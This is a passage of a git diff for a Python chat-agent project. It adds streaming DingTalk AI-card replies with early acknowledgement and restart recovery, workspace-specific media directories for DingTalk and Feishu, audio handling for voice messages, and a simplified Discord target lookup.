import markdown as dingtalk_markdown +from .ai_card import ( + FAILED, + FINISHED, + INPUTING, + PROCESSING, + AICardPendingStore, + ActiveAICard, +) from .utils import guess_suffix_from_file_content if TYPE_CHECKING: @@ -62,6 +78,23 @@ logger = logging.getLogger(__name__) +def _make_safe_dingtalk_stream_logger(base: logging.Logger) -> logging.Logger: + """Patch logger.exception to tolerate malformed msg/args usage.""" + if getattr(base, "_copaw_safe_exception_patched", False): + return base + + def _safe_exception(self: logging.Logger, msg, *args, **kwargs): + if args and "%" not in str(msg): + msg = f"{msg}: " + " ".join(str(item) for item in args) + args = () + kwargs.setdefault("exc_info", True) + self.error(msg, *args, **kwargs) + + base.exception = types.MethodType(_safe_exception, base) # type: ignore[assignment] + setattr(base, "_copaw_safe_exception_patched", True) + return base + + class DingTalkChannel(BaseChannel): """DingTalk Channel: DingTalk Stream -> Incoming -> to_agent_request -> process -> send_response -> DingTalk reply. 
@@ -85,7 +118,12 @@ def __init__( client_id: str, client_secret: str, bot_prefix: str, - media_dir: str = "~/.copaw/media", + message_type: str = "markdown", + card_template_id: str = "", + card_template_key: str = "content", + robot_code: str = "", + media_dir: str = "", + workspace_dir: Path | None = None, on_reply_sent: OnReplySent = None, show_tool_details: bool = True, filter_tool_messages: bool = False, @@ -112,7 +150,26 @@ def __init__( self.client_id = client_id self.client_secret = client_secret self.bot_prefix = bot_prefix - self._media_dir = Path(media_dir).expanduser() + self.message_type = (message_type or "markdown").strip().lower() + self.card_template_id = card_template_id or "" + self.card_template_key = card_template_key or "content" + self.robot_code = robot_code or self.client_id + self._active_cards: Dict[str, ActiveAICard] = {} + self._active_cards_lock = asyncio.Lock() + self._card_store = AICardPendingStore( + get_config_path().parent / "dingtalk-active-cards.json", + ) + self._workspace_dir = ( + Path(workspace_dir).expanduser() if workspace_dir else None + ) + # Use workspace-specific media dir if workspace_dir is provided + if not media_dir and self._workspace_dir: + self._media_dir = self._workspace_dir / "media" + elif media_dir: + self._media_dir = Path(media_dir).expanduser() + else: + self._media_dir = DEFAULT_MEDIA_DIR + self._media_dir.mkdir(parents=True, exist_ok=True) self._client: Optional[dingtalk_stream.DingTalkStreamClient] = None self._loop: Optional[asyncio.AbstractEventLoop] = None @@ -156,7 +213,15 @@ def from_env( client_id=os.getenv("DINGTALK_CLIENT_ID", ""), client_secret=os.getenv("DINGTALK_CLIENT_SECRET", ""), bot_prefix=os.getenv("DINGTALK_BOT_PREFIX", "[BOT] "), - media_dir=os.getenv("DINGTALK_MEDIA_DIR", "~/.copaw/media"), + message_type=os.getenv("DINGTALK_MESSAGE_TYPE", "markdown"), + card_template_id=os.getenv("DINGTALK_CARD_TEMPLATE_ID", ""), + card_template_key=os.getenv( + "DINGTALK_CARD_TEMPLATE_KEY", + 
                "content",
+            ),
+            robot_code=os.getenv("DINGTALK_ROBOT_CODE", "")
+            or os.getenv("DINGTALK_CLIENT_ID", ""),
+            media_dir=os.getenv("DINGTALK_MEDIA_DIR", ""),
             on_reply_sent=on_reply_sent,
             dm_policy=os.getenv("DINGTALK_DM_POLICY", "open"),
             group_policy=os.getenv("DINGTALK_GROUP_POLICY", "open"),
@@ -174,6 +239,7 @@ def from_config(
         show_tool_details: bool = True,
         filter_tool_messages: bool = False,
         filter_thinking: bool = False,
+        workspace_dir: Path | None = None,
     ) -> "DingTalkChannel":
         return cls(
             process=process,
@@ -181,7 +247,14 @@ def from_config(
             client_id=config.client_id or "",
             client_secret=config.client_secret or "",
             bot_prefix=config.bot_prefix or "[BOT] ",
-            media_dir=config.media_dir or "~/.copaw/media",
+            message_type=getattr(config, "message_type", "markdown"),
+            card_template_id=getattr(config, "card_template_id", ""),
+            card_template_key=getattr(config, "card_template_key", "content"),
+            robot_code=(
+                getattr(config, "robot_code", "") or config.client_id or ""
+            ),
+            media_dir=config.media_dir or "",
+            workspace_dir=workspace_dir,
             on_reply_sent=on_reply_sent,
             show_tool_details=show_tool_details,
             filter_tool_messages=filter_tool_messages,
@@ -257,7 +330,13 @@ def _route_from_handle(self, to_handle: str) -> dict:
         return {"webhook_key": s} if s else {}

     def _session_webhook_store_path(self) -> Path:
-        """Path to persist session webhook mapping (for cron after restart)."""
+        """Path to persist session webhook mapping (for cron after restart).
+
+        Uses agent workspace directory if available, otherwise falls back
+        to global config directory for backward compatibility.
+        """
+        if self._workspace_dir:
+            return self._workspace_dir / "dingtalk_session_webhooks.json"
         return get_config_path().parent / "dingtalk_session_webhooks.json"

     def _load_session_webhook_store_from_disk(self) -> None:
@@ -390,6 +469,19 @@ def _release_message_ids(self, msg_ids: List[str]) -> None:
             len(self._processing_message_ids),
         )

+    @staticmethod
+    def _safe_set_future_result(
+        future: "asyncio.Future[str]",
+        text: str,
+    ) -> None:
+        """Set future result only if not already done (idempotent).
+
+        Guards against InvalidStateError when _ack_early already resolved
+        the future before _reply_sync_batch is called at stream end.
+        """
+        if not future.done():
+            future.set_result(text)
+
     def _reply_sync(self, meta: Dict[str, Any], text: str) -> None:
         """Resolve reply_future on the stream thread's loop so process()
         can continue and reply.
@@ -398,7 +490,11 @@ def _reply_sync(self, meta: Dict[str, Any], text: str) -> None:
         reply_future = meta.get("reply_future")
         if reply_loop is None or reply_future is None:
             return
-        reply_loop.call_soon_threadsafe(reply_future.set_result, text)
+        reply_loop.call_soon_threadsafe(
+            self._safe_set_future_result,
+            reply_future,
+            text,
+        )
         if "_message_ids" in meta:
             ids = meta["_message_ids"]
         else:
@@ -414,7 +510,8 @@ def _reply_sync_batch(self, meta: Dict[str, Any], text: str) -> None:
             for reply_loop, reply_future in lst:
                 if reply_loop and reply_future:
                     reply_loop.call_soon_threadsafe(
-                        reply_future.set_result,
+                        self._safe_set_future_result,
+                        reply_future,
                         text,
                     )
             ids = meta["_message_ids"] if "_message_ids" in meta else []
@@ -422,6 +519,42 @@ def _reply_sync_batch(self, meta: Dict[str, Any], text: str) -> None:
         else:
             self._reply_sync(meta, text)

+    def _ack_early(self, meta: Dict[str, Any], text: str) -> None:
+        """Resolve reply_futures immediately for streaming paths (AI card /
+        sessionWebhook) WITHOUT releasing dedup msg_ids.
+
+        Unblocks the DingTalk stream callback handler so it can return
+        STATUS_OK to the SDK quickly, preventing DingTalk retry storms
+        during long LLM generation. Dedup msg_ids are released later by
+        _reply_sync_batch once streaming fully completes, so any DingTalk
+        re-delivery before that point is still correctly rejected.
+        """
+        lst = meta.get("_reply_futures_list") or []
+        if lst:
+            for reply_loop, reply_future in lst:
+                if reply_loop and reply_future:
+                    reply_loop.call_soon_threadsafe(
+                        self._safe_set_future_result,
+                        reply_future,
+                        text,
+                    )
+            futures_count = len(lst)
+        else:
+            reply_loop = meta.get("reply_loop")
+            reply_future = meta.get("reply_future")
+            if reply_loop and reply_future:
+                reply_loop.call_soon_threadsafe(
+                    self._safe_set_future_result,
+                    reply_future,
+                    text,
+                )
+            futures_count = 1 if meta.get("reply_future") else 0
+        logger.debug(
+            "dingtalk _ack_early: text=%r futures_count=%s",
+            text,
+            futures_count,
+        )
+
     def _get_session_webhook(
         self,
         meta: Optional[Dict[str, Any]],
@@ -1192,10 +1325,6 @@ async def send_content_parts(
             else:
                 await self.send(to_handle, body.strip() or prefix, meta)

-    def get_debounce_key(self, payload: Any) -> str:
-        """Use short conversation_id or channel:sender for time debounce."""
-        return self._debounce_key(payload)
-
     def merge_native_items(self, items: List[Any]) -> Any:
         """Merge payloads (content_parts + meta) for DingTalk."""
         return self._merge_native(items)
@@ -1317,6 +1446,47 @@ async def _process_one_request(
         last_response = None
         accumulated_parts: list = []
         event_count = 0
+        # _acked_early: reply_future already resolved so DingTalk handler
+        # returned STATUS_OK quickly; msg_ids still held for dedup until
+        # streaming fully completes (_reply_sync_batch at the end).
+        _acked_early = False
+        conversation_id = str(meta.get("conversation_id") or "")
+        use_ai_card = self._ai_card_enabled() and bool(conversation_id)
+        logger.info(
+            "dingtalk ai card gate: enabled=%s "
+            "message_type=%s has_template=%s "
+            "has_robot=%s has_conversation=%s",
+            use_ai_card,
+            self.message_type,
+            bool(self.card_template_id),
+            bool(self.robot_code),
+            bool(conversation_id),
+        )
+        card: Optional[ActiveAICard] = None
+        card_full_text = ""
+        if use_ai_card:
+            try:
+                card = await self._create_ai_card(
+                    conversation_id,
+                    meta=meta,
+                    inbound=True,
+                )
+                # AI card created: ACK DingTalk immediately so the stream
+                # callback handler returns STATUS_OK without waiting for
+                # the full LLM response. This stops DingTalk retry storms
+                # on long-form generations. Dedup msg_ids are kept until
+                # streaming finishes (see _reply_sync_batch below).
+                self._ack_early(reply_meta, SENT_VIA_AI_CARD)
+                _acked_early = True
+                logger.info(
+                    "dingtalk _ack_early: AI card created, "
+                    "handler unblocked early",
+                )
+            except Exception:
+                logger.exception(
+                    "dingtalk create ai card failed, fallback to markdown",
+                )
+                use_ai_card = False

         # Store sessionWebhook (keyed by conversation).
         if session_webhook:
@@ -1355,47 +1525,68 @@ async def _process_one_request(
                         f"dingtalk completed message: type={ev_type} "
                         f"parts_count={len(parts)}",
                     )
-                    if use_multi and parts and session_webhook:
-                        body = self._parts_to_single_text(
-                            parts,
-                            bot_prefix="",
+                    body = self._parts_to_single_text(
+                        parts,
+                        bot_prefix="",
+                    )
+                    if use_ai_card and card:
+                        next_card_text = self._merge_ai_card_text(
+                            card_full_text,
+                            body,
                         )
+                        try:
+                            if next_card_text != card_full_text:
+                                card_full_text = next_card_text
+                                await self._stream_ai_card(
+                                    card,
+                                    card_full_text,
+                                    finalize=False,
+                                )
+                        except Exception:
+                            logger.exception(
+                                "dingtalk stream ai card failed,"
+                                " fallback to markdown",
+                            )
+                            await self._mark_card_failed(conversation_id)
+                            use_ai_card = False
+                            fallback_body = body.strip() or card_full_text.strip()
+                            if use_multi and session_webhook and fallback_body:
+                                await self._send_via_session_webhook(
+                                    session_webhook,
+                                    fallback_body,
+                                    bot_prefix="",
+                                )
+                            else:
+                                accumulated_parts.extend(parts)
+                    elif use_multi and parts and session_webhook:
                         if body.strip():
                             await self._send_via_session_webhook(
                                 session_webhook,
                                 body.strip(),
                                 bot_prefix="",
                             )
+                        # First webhook message sent: ACK DingTalk early so
+                        # handler returns STATUS_OK without waiting for the
+                        # full LLM response.
+                        if not _acked_early:
+                            self._ack_early(reply_meta, SENT_VIA_WEBHOOK)
+                            _acked_early = True
+                            logger.info(
+                                "dingtalk _ack_early: first webhook chunk "
+                                "sent, handler unblocked early",
+                            )
                         _media_types = (
                             ContentType.IMAGE,
                             ContentType.FILE,
                             ContentType.VIDEO,
                             ContentType.AUDIO,
                         )
-                        media_count = sum(
-                            1
-                            for p in parts
-                            if getattr(p, "type", None) in _media_types
-                        )
-                        if media_count:
-                            logger.info(
-                                "dingtalk consume_loop: "
-                                "sending %s media "
-                                "parts via webhook",
-                                media_count,
-                            )
                         for part in parts:
                             if getattr(part, "type", None) in _media_types:
-                                ok = await self._send_media_part_via_webhook(
+                                await self._send_media_part_via_webhook(
                                     session_webhook,
                                     part,
                                 )
-                                logger.info(
-                                    "dingtalk consume_loop: media part "
-                                    "type=%s result=%s",
-                                    getattr(part, "type", None),
-                                    ok,
-                                )
                     else:
                         accumulated_parts.extend(parts)
                 elif obj == "response":
@@ -1409,7 +1600,23 @@ async def _process_one_request(
             )

         err_msg = self._get_response_error_message(last_response)
-        if err_msg:
+        if use_ai_card and card:
+            final_text = card_full_text or self._build_ai_card_initial_text()
+            try:
+                if err_msg:
+                    final_text = self.bot_prefix + f"Error: {err_msg}"
+                await self._stream_ai_card(card, final_text, finalize=True)
+            except Exception:
+                logger.exception("dingtalk finalize ai card failed")
+                await self._mark_card_failed(conversation_id)
+                if use_multi and session_webhook:
+                    await self._send_via_session_webhook(
+                        session_webhook,
+                        final_text,
+                        bot_prefix="",
+                    )
+            self._reply_sync_batch(reply_meta, SENT_VIA_AI_CARD)
+        elif err_msg:
             err_text = self.bot_prefix + f"Error: {err_msg}"
             if use_multi and session_webhook:
                 await self._send_via_session_webhook(
@@ -1452,14 +1659,6 @@ async def _process_one_request(
             request.session_id or f"{self.channel}:{request.user_id}",
         )

-    def _debounce_key(self, native: Any) -> str:
-        payload = native if isinstance(native, dict) else {}
-        meta = payload.get("meta") or {}
-        cid = meta.get("conversation_id") or ""
-        if cid:
-            return short_session_id_from_conversation_id(str(cid))
-        return f"{self.channel}:{payload.get('sender_id', '')}"
-
     def _merge_native(self, items: list) -> dict:
         """Merge multiple native payloads into one (content_parts + meta)."""
         if not items:
@@ -1600,7 +1799,12 @@ async def start(self) -> None:
             self.client_id,
             self.client_secret,
         )
-        self._client = dingtalk_stream.DingTalkStreamClient(credential)
+        self._client = dingtalk_stream.DingTalkStreamClient(
+            credential,
+            logger=_make_safe_dingtalk_stream_logger(
+                logging.getLogger("copaw.dingtalk.stream")
+            ),
+        )
         enqueue_cb = getattr(self, "_enqueue", None)
         internal_handler = DingTalkChannelHandler(
             main_loop=self._loop,
@@ -1622,6 +1826,7 @@ async def start(self) -> None:
         self._stream_thread.start()
         if self._http is None:
             self._http = aiohttp.ClientSession()
+        await self._recover_active_cards()

     async def stop(self) -> None:
         if not self.enabled:
@@ -1639,11 +1844,390 @@ async def stop(self) -> None:
             )
         self._debounce_timers.clear()
         self._debounce_pending.clear()
+        # best-effort finalize active cards before stopping
+        for conv_id in list(self._active_cards.keys()):
+            try:
+                card = self._active_cards.get(conv_id)
+                if card and card.state not in (FINISHED, FAILED):
+                    await self._stream_ai_card(
+                        card,
+                        card.last_streamed_content
+                        or AI_CARD_RECOVERY_FINAL_TEXT,
+                        finalize=True,
+                    )
+            except Exception:
+                logger.debug(
+                    "dingtalk finalize active card on stop failed",
+                    exc_info=True,
+                )
         if self._http is not None:
             await self._http.close()
             self._http = None
         self._client = None

+    # Note: dingtalk_stream SDK has AICardReplier/CardReplier,
+    # but those APIs are request/reply oriented and tied to ChatbotMessage
+    # context; here we keep raw OpenAPI calls to support proactive recovery
+    # and persisted card lifecycles across restarts.
+    def _ai_card_enabled(self) -> bool:
+        return (
+            self.message_type == "card"
+            and bool(self.card_template_id)
+            and bool(self.robot_code)
+        )
+
+    def _build_ai_card_initial_text(self) -> str:
+        return self.bot_prefix + AI_CARD_PROCESSING_TEXT
+
+    def _merge_ai_card_text(self, current: str, incoming: str) -> str:
+        current = (current or "").strip()
+        incoming = (incoming or "").strip()
+        if not incoming:
+            return current
+        if not current:
+            return incoming
+        if incoming == current or current.endswith(incoming):
+            return current
+        return f"{current}\n{incoming}".strip()
+
+    async def _save_active_cards(self) -> None:
+        async with self._active_cards_lock:
+            self._card_store.save(self._active_cards)
+
+    async def _mark_card_failed(self, conversation_id: str) -> None:
+        async with self._active_cards_lock:
+            card = self._active_cards.get(conversation_id)
+            if card:
+                card.state = FAILED
+                card.last_updated = int(time.time() * 1000)
+            self._active_cards.pop(conversation_id, None)
+            self._card_store.save(self._active_cards)
+
+    async def _create_ai_card(
+        self,
+        conversation_id: str,
+        meta: Optional[Dict[str, Any]] = None,
+        inbound: bool = True,
+    ) -> Optional[ActiveAICard]:
+        if not self._ai_card_enabled() or self._http is None:
+            logger.warning(
+                "dingtalk create ai card skipped: enabled=%s http_ready=%s "
+                "message_type=%s has_template=%s has_robot=%s",
+                self._ai_card_enabled(),
+                self._http is not None,
+                self.message_type,
+                bool(self.card_template_id),
+                bool(self.robot_code),
+            )
+            return None
+        token = await self._get_access_token()
+        card_instance_id = f"card_{uuid4()}"
+        meta = meta or {}
+        incoming_message = meta.get("incoming_message")
+        sender_staff_id = (
+            meta.get("sender_staff_id")
+            or getattr(incoming_message, "sender_staff_id", None)
+            or getattr(incoming_message, "senderStaffId", None)
+            or ""
+        )
+        is_group = bool(meta.get("is_group"))
+        create_payload: Dict[str, Any] = {
+            "cardTemplateId": self.card_template_id,
+            "outTrackId": card_instance_id,
+            "cardData": {"cardParamMap": {self.card_template_key: ""}},
+            "callbackType": "STREAM",
+            "imGroupOpenSpaceModel": {"supportForward": True},
+            "imRobotOpenSpaceModel": {"supportForward": True},
+        }
+
+        headers = {
+            "Content-Type": "application/json",
+            "x-acs-dingtalk-access-token": token,
+        }
+        create_url = "https://api.dingtalk.com/v1.0/card/instances"
+        logger.info(
+            "dingtalk create ai card: conversation_id=%s is_group=%s "
+            "sender_staff_id=%s template_id=%s inbound=%s",
+            conversation_id,
+            is_group,
+            sender_staff_id,
+            self.card_template_id,
+            inbound,
+        )
+        async with self._http.post(
+            create_url,
+            json=create_payload,
+            headers=headers,
+        ) as resp:
+            body = await resp.text()
+            logger.info(
+                "dingtalk create ai card response: status=%s body=%s",
+                resp.status,
+                body[:1000],
+            )
+            if resp.status >= 400:
+                raise RuntimeError(
+                    "create ai card failed"
+                    f" status={resp.status}"
+                    f" body={body[:500]}",
+                )
+
+        if is_group:
+            open_space_id = f"dtv1.card//IM_GROUP.{conversation_id}"
+            deliver_payload: Dict[str, Any] = {
+                "outTrackId": card_instance_id,
+                "userIdType": 1,
+                "openSpaceId": open_space_id,
+                "imGroupOpenDeliverModel": {
+                    "robotCode": self.robot_code,
+                },
+            }
+        else:
+            if not sender_staff_id:
+                raise RuntimeError(
+                    "create ai card failed:"
+                    " missing sender_staff_id for IM_ROBOT",
+                )
+            open_space_id = f"dtv1.card//IM_ROBOT.{sender_staff_id}"
+            deliver_payload = {
+                "outTrackId": card_instance_id,
+                "userIdType": 1,
+                "openSpaceId": open_space_id,
+                "imRobotOpenDeliverModel": {
+                    "spaceType": "IM_ROBOT",
+                },
+            }
+
+        deliver_url = "https://api.dingtalk.com/v1.0/card/instances/deliver"
+        logger.info(
+            "dingtalk deliver ai card: conversation_id=%s open_space_id=%s",
+            conversation_id,
+            open_space_id,
+        )
+        async with self._http.post(
+            deliver_url,
+            json=deliver_payload,
+            headers=headers,
+        ) as resp:
+            deliver_body = await resp.text()
+            logger.info(
+                "dingtalk deliver ai card response: status=%s body=%s",
+                resp.status,
+                deliver_body[:1000],
+            )
+            if resp.status >= 400:
+                raise RuntimeError(
+                    "deliver ai card failed"
+                    f" status={resp.status}"
+                    f" body={deliver_body[:500]}",
+                )
+
+        try:
+            deliver_data = json.loads(deliver_body) if deliver_body else {}
+        except json.JSONDecodeError:
+            deliver_data = {}
+        result = (
+            deliver_data.get("result")
+            if isinstance(deliver_data, dict)
+            else None
+        )
+        if isinstance(result, list):
+            deliver_results = result
+        elif isinstance(result, dict):
+            deliver_results = result.get("deliverResults")
+        else:
+            deliver_results = None
+        if isinstance(deliver_results, list):
+            failed = [
+                item
+                for item in deliver_results
+                if isinstance(item, dict) and not item.get("success", False)
+            ]
+            if failed:
+                err = failed[0]
+                raise RuntimeError(
+                    "deliver ai card failed: "
+                    f"spaceId={err.get('spaceId')} "
+                    f"spaceType={err.get('spaceType')} "
+                    f"errorMsg={err.get('errorMsg')}",
+                )
+        logger.info(
+            "dingtalk create ai card ok:"
+            " conversation_id=%s card_instance_id=%s",
+            conversation_id,
+            card_instance_id,
+        )
+
+        now_ms = int(time.time() * 1000)
+        card = ActiveAICard(
+            card_instance_id=card_instance_id,
+            access_token=token,
+            conversation_id=conversation_id,
+            account_id="default",
+            store_path=str(self._card_store.path),
+            created_at=now_ms,
+            last_updated=now_ms,
+            state=PROCESSING,
+            last_streamed_content="",
+        )
+        async with self._active_cards_lock:
+            self._active_cards[conversation_id] = card
+            if inbound:
+                self._card_store.save(self._active_cards)
+        return card
+
+    async def _stream_ai_card(
+        self,
+        card: ActiveAICard,
+        content: str,
+        finalize: bool = False,
+    ) -> bool:
+        if self._http is None or card.state in (FINISHED, FAILED):
+            return False
+
+        content = (content or "").strip()
+        if not content:
+            return False
+
+        now_ms = int(time.time() * 1000)
+        if not finalize:
+            if content == (card.last_streamed_content or "").strip():
+                return False
+            if (
+                card.last_updated
+                and (now_ms - card.last_updated)
+                < AI_CARD_STREAM_MIN_INTERVAL_SECONDS * 1000
+            ):
+                return False
+
+        if (
+            now_ms - card.created_at
+        ) > AI_CARD_TOKEN_PREEMPTIVE_REFRESH_SECONDS * 1000:
+            card.access_token = await self._get_access_token()
+
+        payload = {
+            "outTrackId": card.card_instance_id,
+            "guid": str(uuid4()),
+            "key": self.card_template_key,
+            "content": content,
+            "isFull": True,
+            "isFinalize": finalize,
+            "isError": False,
+        }
+        url = "https://api.dingtalk.com/v1.0/card/streaming"
+
+        async def _do_stream(token: str):
+            headers = {
+                "Content-Type": "application/json",
+                "x-acs-dingtalk-access-token": token,
+            }
+            logger.info(
+                "dingtalk stream ai card: conversation_id=%s finalize=%s "
+                "content_len=%s",
+                card.conversation_id,
+                finalize,
+                len(content),
+            )
+            async with self._http.put(
+                url,
+                json=payload,
+                headers=headers,
+            ) as resp:
+                txt = await resp.text()
+                logger.info(
+                    "dingtalk stream ai card response:"
+                    " status=%s finalize=%s body=%s",
+                    resp.status,
+                    finalize,
+                    txt[:1000],
+                )
+                return resp.status, txt
+
+        status, txt = await _do_stream(card.access_token)
+        if status == 401:
+            card.access_token = await self._get_access_token()
+            status, txt = await _do_stream(card.access_token)
+
+        if status >= 400:
+            if status == 500 and "unknownError" in txt:
+                raise RuntimeError(
+                    "dingtalk ai card unknownError:"
+                    " card_template_key mismatch?",
+                )
+            raise RuntimeError(
+                f"stream ai card failed status={status} body={txt[:500]}",
+            )
+        logger.info(
+            "dingtalk stream ai card ok: conversation_id=%s finalize=%s",
+            card.conversation_id,
+            finalize,
+        )
+
+        card.last_streamed_content = content
+        card.last_updated = int(time.time() * 1000)
+        if finalize:
+            card.state = FINISHED
+            async with self._active_cards_lock:
+                self._active_cards.pop(card.conversation_id, None)
+                self._card_store.save(self._active_cards)
+        elif card.state == PROCESSING:
+            card.state = INPUTING
+            await self._save_active_cards()
+        return True
+
+    async def _finish_ai_card(
+        self,
+        conversation_id: str,
+        final_content: str,
+    ) -> bool:
+        async with self._active_cards_lock:
+            card = self._active_cards.get(conversation_id)
+        if not card:
+            return False
+        return await self._stream_ai_card(card, final_content, finalize=True)
+
+    async def _recover_active_cards(self) -> None:
+        if not self._ai_card_enabled() or self._http is None:
+            return
+        records = self._card_store.load()
+        if not records:
+            return
+        token = await self._get_access_token()
+        for item in records:
+            state = str(item.get("state") or "")
+            if state in (FINISHED, FAILED):
+                continue
+            conversation_id = item.get("conversation_id") or ""
+            card_id = item.get("card_instance_id") or f"card_{uuid4()}"
+            if not conversation_id:
+                continue
+            card = ActiveAICard(
+                card_instance_id=card_id,
+                access_token=token,
+                conversation_id=conversation_id,
+                account_id=item.get("account_id") or "default",
+                store_path=str(self._card_store.path),
+                created_at=int(
+                    item.get("created_at") or int(time.time() * 1000),
+                ),
+                last_updated=int(
+                    item.get("last_updated") or int(time.time() * 1000),
+                ),
+                state=state or PROCESSING,
+                last_streamed_content="",
+            )
+            async with self._active_cards_lock:
+                self._active_cards[conversation_id] = card
+            try:
+                await self._stream_ai_card(
+                    card,
+                    AI_CARD_RECOVERY_FINAL_TEXT,
+                    finalize=True,
+                )
+            except Exception:
+                logger.exception("dingtalk ai card recovery finalize failed")
+                await self._mark_card_failed(conversation_id)
+
     async def send(
         self,
         to_handle: str,
diff --git a/src/copaw/app/channels/dingtalk/constants.py b/src/copaw/app/channels/dingtalk/constants.py
index 1ce1e40e1..de572c8cb 100644
--- a/src/copaw/app/channels/dingtalk/constants.py
+++ b/src/copaw/app/channels/dingtalk/constants.py
@@ -3,10 +3,14 @@
 # When consumer sends all messages via sessionWebhook, process() skips reply
 SENT_VIA_WEBHOOK = "__SENT_VIA_WEBHOOK__"
+SENT_VIA_AI_CARD = "__SENT_VIA_AI_CARD__"

 # Token cache TTL (1 hour)
 DINGTALK_TOKEN_TTL_SECONDS = 3600

+# Minimum interval between non-final AI Card updates.
+AI_CARD_STREAM_MIN_INTERVAL_SECONDS = 0.6
+
 # Time debounce (300ms)
 DINGTALK_DEBOUNCE_SECONDS = 0.3
@@ -16,4 +20,9 @@
 # DingTalk message type to runtime content type
 DINGTALK_TYPE_MAPPING = {
     "picture": "image",
+    "voice": "audio",
 }
+
+AI_CARD_TOKEN_PREEMPTIVE_REFRESH_SECONDS = 90 * 60
+AI_CARD_PROCESSING_TEXT = "处理中..."
+AI_CARD_RECOVERY_FINAL_TEXT = "⚠️ 上一次回复处理中断,已自动结束。请重新发送你的问题。"
diff --git a/src/copaw/app/channels/dingtalk/content_utils.py b/src/copaw/app/channels/dingtalk/content_utils.py
index 12d18d9cd..4caf2270a 100644
--- a/src/copaw/app/channels/dingtalk/content_utils.py
+++ b/src/copaw/app/channels/dingtalk/content_utils.py
@@ -10,7 +10,7 @@
 from urllib.parse import parse_qs, urlparse

 from agentscope_runtime.engine.schemas.agent_schemas import (
-    # AudioContent,
+    AudioContent,
     FileContent,
     ImageContent,
     VideoContent,
@@ -37,13 +37,10 @@ def dingtalk_content_from_type(mapped: str, url: str) -> Any:
     if mapped == "video":
         return VideoContent(type=ContentType.VIDEO, video_url=url)
     if mapped == "audio":
-        # Use subtype only: runtime prefixes with "audio/" -> "audio/amr".
-        # TODO: change to audio block when as support amr
-        return FileContent(
-            type=ContentType.FILE,
-            file_url=url,
-            # data=url,
-            # format="amr",
+        return AudioContent(
+            type=ContentType.AUDIO,
+            data=url,
+            format="amr",
         )
     return FileContent(type=ContentType.FILE, file_url=url)
diff --git a/src/copaw/app/channels/dingtalk/handler.py b/src/copaw/app/channels/dingtalk/handler.py
index b96d77843..cf6e2bef2 100644
--- a/src/copaw/app/channels/dingtalk/handler.py
+++ b/src/copaw/app/channels/dingtalk/handler.py
@@ -15,7 +15,7 @@

 from ..base import ContentType

-from .constants import SENT_VIA_WEBHOOK
+from .constants import SENT_VIA_AI_CARD, SENT_VIA_WEBHOOK
 from .content_utils import (
     conversation_id_from_chatbot_message,
     conversation_type_from_chatbot_message,
@@ -121,12 +121,14 @@ def _parse_rich_content(
             # Text may be under "text" or "content" (API variation).
             item_text = item.get("text") or item.get("content")
             if item_text is not None:
-                content.append(
-                    TextContent(
-                        type=ContentType.TEXT,
-                        text=(item_text or "").strip(),
-                    ),
-                )
+                stripped = (item_text or "").strip()
+                if stripped:
+                    content.append(
+                        TextContent(
+                            type=ContentType.TEXT,
+                            text=stripped,
+                        ),
+                    )
         # Picture items may use pictureDownloadCode or downloadCode.
         dl_code = (
             item.get("downloadCode")
@@ -260,6 +262,13 @@ async def process(self, callback: CallbackMessage) -> tuple[int, str]:
             "reply_loop": loop,
             "conversation_type": conversation_type,
             "is_group": is_group,
+            "sender_staff_id": getattr(
+                incoming_message,
+                "sender_staff_id",
+                None,
+            )
+            or getattr(incoming_message, "senderStaffId", None)
+            or "",
         }
         if is_bot_mentioned:
             meta["bot_mentioned"] = True
@@ -335,7 +344,10 @@ async def process(self, callback: CallbackMessage) -> tuple[int, str]:
             self._emit_native_threadsafe(native)

         response_text = await reply_future
-        if response_text == SENT_VIA_WEBHOOK:
+        if response_text == SENT_VIA_AI_CARD:
+            logger.info("sent to=%s via ai card", sender)
+            self.reply_text(" ", incoming_message)
+        elif response_text == SENT_VIA_WEBHOOK:
             logger.info(
                 "sent to=%s via sessionWebhook (multi-message)",
                 sender,
diff --git a/src/copaw/app/channels/discord_/channel.py b/src/copaw/app/channels/discord_/channel.py
index dbbd533df..6400ff2fd 100644
--- a/src/copaw/app/channels/discord_/channel.py
+++ b/src/copaw/app/channels/discord_/channel.py
@@ -283,26 +283,22 @@ def from_config(
             require_mention=config.require_mention,
         )

-    async def _resolve_target(self, to_handle, meta):
+    async def _resolve_target(self, to_handle, _meta):
         """Resolve a Discord Messageable from meta or to_handle."""
-        meta = meta or {}
-        if not meta.get("channel_id") and not meta.get("user_id"):
-            meta.update(self._route_from_handle(to_handle))
-        channel_id = meta.get("channel_id")
-        user_id = meta.get("user_id")
+        route = self._route_from_handle(to_handle)
+        channel_id = route.get("channel_id")
+        user_id = route.get("user_id")
         if channel_id:
-            ch = self._client.get_channel(int(channel_id))
+            cid = int(channel_id)
+            ch = self._client.get_channel(cid)
             if ch is None:
-                ch = await self._client.fetch_channel(
-                    int(channel_id),
-                )
+                ch = await self._client.fetch_channel(cid)
             return ch
         if user_id:
-            user = self._client.get_user(int(user_id))
+            uid = int(user_id)
+            user = self._client.get_user(uid)
             if user is None:
-                user = await self._client.fetch_user(
-                    int(user_id),
-                )
+                user = await self._client.fetch_user(uid)
             return user.dm_channel or await user.create_dm()
         return None
diff --git a/src/copaw/app/channels/feishu/channel.py b/src/copaw/app/channels/feishu/channel.py
index 106287757..54051a077 100644
--- a/src/copaw/app/channels/feishu/channel.py
+++ b/src/copaw/app/channels/feishu/channel.py
@@ -37,6 +37,7 @@

 from ....config.config import FeishuConfig as FeishuChannelConfig
 from ....config.utils import get_config_path
+from ....constant import DEFAULT_MEDIA_DIR
 from ..base import (
     BaseChannel,
     ContentType,
@@ -161,7 +162,8 @@ def __init__(
         bot_prefix: str,
         encrypt_key: str = "",
         verification_token: str = "",
-        media_dir: str = "~/.copaw/media",
+        media_dir: str = "",
+        workspace_dir: Path | None = None,
         on_reply_sent: OnReplySent = None,
         show_tool_details: bool = True,
         filter_tool_messages: bool = False,
@@ -190,7 +192,17 @@ def __init__(
         self.bot_prefix = bot_prefix
         self.encrypt_key = encrypt_key or ""
         self.verification_token = verification_token or ""
-        self._media_dir = Path(media_dir).expanduser()
+        self._workspace_dir = (
+            Path(workspace_dir).expanduser() if workspace_dir else None
+        )
+        # Use workspace-specific media dir if workspace_dir is provided
+        if not media_dir and self._workspace_dir:
+            self._media_dir = self._workspace_dir / "media"
+        elif media_dir:
+            self._media_dir = Path(media_dir).expanduser()
+        else:
+            self._media_dir = DEFAULT_MEDIA_DIR
+        self._media_dir.mkdir(parents=True, exist_ok=True)
         self._client: Any = None
         self._ws_client: Any = None
@@ -235,7 +247,7 @@ def from_env(
